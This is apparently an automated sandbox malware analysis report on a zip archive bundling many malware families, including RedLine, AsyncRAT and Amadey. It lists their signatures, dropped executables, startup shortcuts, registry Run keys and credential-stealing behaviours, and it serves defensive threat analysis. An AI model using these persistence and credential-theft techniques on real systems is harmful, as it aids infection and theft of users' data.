Malware Analysis Report

2025-01-23 11:58

Sample ID 241214-qgw1masrcy
Target 241127-xqsswsslej_pw_infected.zip
SHA256 cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Tags
amadey asyncrat merlin njrat phorphiex quasar redline vidar xworm zharkbot backdoor botnet collection credential_access defense_evasion discovery evasion execution infostealer loader persistence privilege_escalation pyinstaller ransomware rat spyware stealer trojan upx vmprotect worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d

Threat Level: Known bad

The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.

Malicious Activity Summary

amadey asyncrat merlin njrat phorphiex quasar redline vidar xworm zharkbot backdoor botnet collection credential_access defense_evasion discovery evasion execution infostealer loader persistence privilege_escalation pyinstaller ransomware rat spyware stealer trojan upx vmprotect worm

AsyncRat

RedLine payload

Amadey

Xworm

Detects ZharkBot payload

Quasar RAT

njRAT/Bladabindi

RedLine

Merlin payload

Detect Xworm Payload

ZharkBot

Vidar family

Vidar

Asyncrat family

Merlin

Zharkbot family

Phorphiex payload

Xworm family

Quasar family

Phorphiex, Phorpiex

Phorphiex family

Njrat family

Quasar payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Merlin family

Redline family

Detect Vidar Stealer

Amadey family

Async RAT payload

Blocklisted process makes network request

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Modifies Windows Firewall

Clipboard Data

Drops startup file

Reads WinSCP keys stored on the system

Reads local data of messenger clients

Executes dropped EXE

Loads dropped DLL

Reads data files stored by FTP clients

Reads user/profile data of web browsers

Checks computer location settings

VMProtect packed file

Unsecured Credentials: Credentials In Files

Obfuscated Files or Information: Command Obfuscation

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Enumerates connected drives

Adds Run key to start application

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops autorun.inf file

UPX packed file

Enumerates processes with tasklist

Sets desktop wallpaper using registry

Drops file in Windows directory

Drops file in Program Files directory

Event Triggered Execution: Installer Packages

Program crash

Embeds OpenSSL

System Network Configuration Discovery: Internet Connection Discovery

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Detects Pyinstaller

System Network Configuration Discovery: Wi-Fi Discovery

Gathers system information

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Suspicious behavior: AddClipboardFormatListener

Modifies registry class

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Detects videocard installed

Delays execution with timeout.exe

Kills process with taskkill

Checks processor information in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies Control Panel

Runs ping.exe

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Enumerates system info in registry

GoLang User-Agent

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-14 13:14

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-14 13:14

Reported

2024-12-14 13:22

Platform

win10v2004-20241007-es

Max time kernel

266s

Max time network

350s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects ZharkBot payload

Description Indicator Process Target
N/A N/A N/A N/A

Merlin

backdoor merlin

Merlin family

merlin

Merlin payload

Description Indicator Process Target
N/A N/A N/A N/A

Njrat family

njrat

Phorphiex family

phorphiex

Phorphiex payload

Description Indicator Process Target
N/A N/A N/A N/A

Phorphiex, Phorpiex

worm trojan loader phorphiex

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Vidar

stealer vidar

Vidar family

vidar

Xworm

trojan rat xworm

Xworm family

xworm

ZharkBot

botnet zharkbot

Zharkbot family

zharkbot

njRAT/Bladabindi

trojan njrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\4363463463464363463463463\Files\dayum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\4363463463464363463463463\Files\XSploitLauncher.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\ctx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\in.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url C:\Windows\SYSTEM32\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wave.lnk C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\af0aa29f43924811e1101d2b844fbfd3.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\af0aa29f43924811e1101d2b844fbfd3.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wave.lnk C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url C:\Windows\SYSTEM32\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\347814563.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\TestExe.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe N/A
N/A N/A C:\Windows\sysnldcvmr.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\614016133.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\test.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\SS0T34UUZ0O3B.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1989810276.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\DQMX7GNJJKEGRVV.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6538.tmp.ssg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MethodSignature\tzemsotp\Product.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\c1.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\tmp.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\boleto.exe N/A
N/A N/A C:\Windows\rundll32.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_6700_133786559434265760\client.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\4434.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\dayum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\in.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HardDiskSentinea = "C:\\Users\\Admin\\Favorites\\HardDiskSentine\\redist\\HardDiskSentinelBin.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\af0aa29f43924811e1101d2b844fbfd3 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\af0aa29f43924811e1101d2b844fbfd3 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BingWallpaperApp = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\BingWallpaperApp.exe" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\Windows.exe" C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svсhost = "C:\\Users\\Admin\\AppData\\Roaming\\svсhost.exe" C:\Users\Admin\AppData\Roaming\svchost.exe N/A
